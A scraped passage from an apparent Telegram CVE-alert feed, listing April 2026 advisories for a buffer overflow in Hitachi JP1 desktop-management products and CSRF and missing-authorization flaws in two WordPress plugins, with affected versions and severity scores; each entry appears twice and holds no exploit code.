from 09-00 through 09-51-13.
Severity: 5.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2025-65116 - Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 and JP1/NETM/DM",
"Content": "CVE ID :CVE-2025-65116
Published : April 7, 2026, 6:16 a.m. | 1 hour, 22 minutes ago
Description :Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.
Severity: 5.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-34896 - WordPress Under Construction, Coming Soon & Maintenance Mode plugin <= 2.1.1 - cross site request forgery (csrf) vulnerability",
"Content": "CVE ID :CVE-2026-34896
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross Site Request Forgery.This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1.
Severity: 7.5 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-34896 - WordPress Under Construction, Coming Soon & Maintenance Mode plugin <= 2.1.1 - cross site request forgery (csrf) vulnerability",
"Content": "CVE ID :CVE-2026-34896
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross Site Request Forgery.This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1.
Severity: 7.5 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-34899 - WordPress LTL Freight Quotes – Worldwide Express Edition plugin <= 5.2.1 - broken access control vulnerability",
"Content": "CVE ID :CVE-2026-34899
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Missing Authorization vulnerability in Eniture technology LTL Freight Quotes – Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LTL Freight Quotes – Worldwide Express Edition: from n/a through 5.2.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
"Source": "CVE FEED",
"Title": "CVE-2026-34899 - WordPress LTL Freight Quotes – Worldwide Express Edition plugin <= 5.2.1 - broken access control vulnerability",
"Content": "CVE ID :CVE-2026-34899
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Missing Authorization vulnerability in Eniture technology LTL Freight Quotes – Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LTL Freight Quotes – Worldwide Express Edition: from n/a through 5.2.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹